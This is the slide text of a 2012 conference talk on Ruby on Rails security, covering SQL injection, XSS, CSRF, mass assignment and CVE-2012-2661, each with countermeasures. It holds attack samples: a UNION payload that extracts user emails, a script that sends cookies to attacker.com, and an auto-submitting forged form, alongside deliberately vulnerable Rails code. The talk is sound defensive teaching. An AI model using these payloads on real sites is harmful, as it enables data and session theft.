WEB APPLICATION SECURITY IN RAILS

Uri Nativ RailsIsrael 2012

Uri Nativ @unativ

Head of Engineering

Klarna Tel Aviv

#railsisrael

Buy Now, Pay Later

1.  Shop online 2.  Receive your goods 3.  Pay

Alice

Bob

Alice and Bob

Alice and Bob

Alice and Bob

Like Duh?

Alice and Bob

<html> <title> MicroBlogging </title> ...

#$@# %#@&*#$

Alice and Bob

Hack it!

SQL INJECTION

@results = Micropost.where( "content LIKE '%#{params[:query]%’”).all

SELECT 'microposts'.*

FROM 'microposts’ WHERE (content LIKE ’%SEARCHSTRING%’)

SQL Injection

SELECT 'microposts'.* FROM 'microposts' WHERE (content LIKE '%SEARCHSTRING%')

SQL Injection

XXX') UNION SELECT 1, email, 1, 1, 1 FROM users --

SELECT 'microposts'.* FROM 'microposts' WHERE (content LIKE '%XXX') UNION SELECT 1, email, 1, 1, 1 FROM users -- %')

SQL Injection

SELECT 'microposts'.* FROM 'microposts' WHERE (content LIKE '%XXX') UNION SELECT 1, email, 1, 1, 1 FROM users -- %')

SQL Injection

@results = Micropost.where( "content LIKE ?’, "%#{params[:query]}%”) ).all

SQL Injection - countermeasures

CROSS SITE SCRIPTING

XSS

<span class="content"> <%= raw feed_item.content %>

</span>

XSS

<script> document.write('<img src= "http://www.attacker.com/x.png?' + document.cookie + ’” >'); </script>

XSS

<span class="content"> <%= sanitize feed_item.content,

:tags => ['a’] %>

</span>

XSS - countermeasures

The Attack: Execute arbitrary code / defacement JSON is not escaped by default CSS can be injected as well

Countermeasures:

Never trust data from the users Use Markdown (e.g. Redcarpet gem)

XSS

CROSS SITE REQUEST FORGERY

CSRF

www.blog.com

CSRF

1

www.blog.com

2

Click here for free iPad

www.freeiPad.com <form name=“evilform”

action=“www.blog.com/….”> …

<script> document.evilform.submit()

</script>

CSRF

www.blog.com

www.freeiPad.com <form name=“evilform”

action=“www.blog.com/….”> …

<script> document.evilform.submit()

</script>

CSRF

3

www.blog.com

www.freeiPad.com <form name=“evilform”

action=“www.blog.com/….”> …

<script> document.evilform.submit()

</script>

POST /blogpost Content=“Kick Me!”

CSRF

4

<input name ="authenticity_token” type ="hidden” value ="vyFdEgofzU4oSJJn5wypxq4“

/>

CSRF – Authenticity Token

routes.rb match '/delete_post/:id',

to: 'microposts#destroy'

CSRF

class ApplicationController < ActionController::Base

# commented to easily test forms # protect_from_forgery ... end

CSRF

The Attack: Attacker send requests on the victim’s behalf Doesn’t depend on XSS Attacked doesn’t need to be logged-in

Countermeasures:

Use Rails CSRF default protection (do not override it) Use GET for queries Use POST/DELETE/… when updating data Add Sign-out link

CSRF

RAILS SPECIFIC ATTACKS

MASS ASSIGNMENT

boo[gotcha!]

def create @user = User.new(params[:user]) ... end

Mass Assignment

def create @user = User.new(params[:user]) ... end

Mass Assignment

{ :name => “gotcha”, :admin => true }

Blacklist class User < ActiveRecord::Base attr_protected :admin ... end

Mass Assignment - countermeasures

Whitelist class User < ActiveRecord::Base attr_accessible :name, :email, :password, :password_confirmation ...

Mass Assignment - countermeasures

Global Config (whitelist) config.active_record.

whitelist_attributes = true

Mass Assignment - countermeasures

The Attack: Unprotected by default :(

Countermeasures:

Whitelist Blacklist Strong Parameters (whitelist) Rails 4 Logic moved to the controller Available as a Gem

Mass Assignment

SQL INJECTION VULNERABILITY IN RUBY ON RAILS (CVE-2012-2661)

User.where( :id => params[:user_id], :reset_token => params[:token]

) SELECT users.* FROM users WHERE users.id = 6 AND users.reset_token = ’XYZ' LIMIT 1

CVE-2012-2661 SQL Injection

/users/6/password/edit?token[] SELECT users.* FROM users WHERE users.id = 6 AND users.reset_token IS NULL LIMIT 1

CVE-2012-2661 SQL Injection

The Attack: SQL Injection - Affected version: Rails < 3.2.4

Countermeasures:

Upgrade to Rails 3.2.4 or higher

CVE-2012-2661 SQL Injection

------------------------------------------------- | Warning Type | Total | ------------------------------------------------- | Cross Site Scripting | 2 | | Cross-Site Request Forgery | 1 | | Denial of Service | 1 | | Redirect | 1 | | SQL Injection | 4 | -------------------------------------------------

Brakeman

CONCLUSIONS

Make Love not War

Know the threats – OWASP top 10 Follow Rails conventions Ruby on Rails Security Guide

http://guides.rubyonrails.org/security.html

The Ruby on Rails security project

http://www.rorsecurity.info

Rails security mailing list:

http://groups.google.com/group/rubyonrails-security

Conclusions

Daniel Amselem for pair programming Irit Shainzinger for the cool graphics Michael Hartl for his microblogging app tutorial

Thanks to…

Pay Online – Safer and Simpler

https://github.com/unativ/sample_app